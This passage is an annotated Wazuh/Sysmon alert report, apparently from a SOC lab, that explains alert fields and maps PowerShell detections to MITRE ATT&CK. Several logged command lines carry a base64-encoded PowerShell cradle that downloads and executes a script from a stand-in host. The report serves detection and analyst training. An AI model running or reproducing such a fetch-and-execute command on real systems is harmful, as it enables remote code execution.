Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534407.1979756
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:04.9670806Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285714
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:04.958 ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} ProcessId: 15516 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wykul3a2.t0d.ps1 CreationUtcTime: 2025-04-24 22:40:04.958 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:04.958
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc4-680a-bf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wykul3a2.t0d.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:04.958
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:08.758+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:08.758+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  101
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534408.1982525
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:06.4519847Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285733
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:05.956 ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} ProcessId: 16460 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} ParentProcessId: 15516 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:05.956
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc5-680a-c20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16460
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc4-680a-bf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:08.774+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:08.774+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  105
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534408.1990596
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:06.7153003Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285734
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:06.664 ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} ProcessId: 16460 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mpyc2gxe.upa.ps1 CreationUtcTime: 2025-04-24 22:40:06.664 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:06.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc5-680a-c20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16460
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpyc2gxe.upa.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:06.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:11.234+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:11.234+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  102
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534411.1993365
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:08.9554346Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285771
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:07.867 ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} ProcessId: 16560 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} ParentProcessId: 16460 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:07.867
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc7-680a-c40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16560
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc5-680a-c20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16460
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:11.248+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:11.248+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  106
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
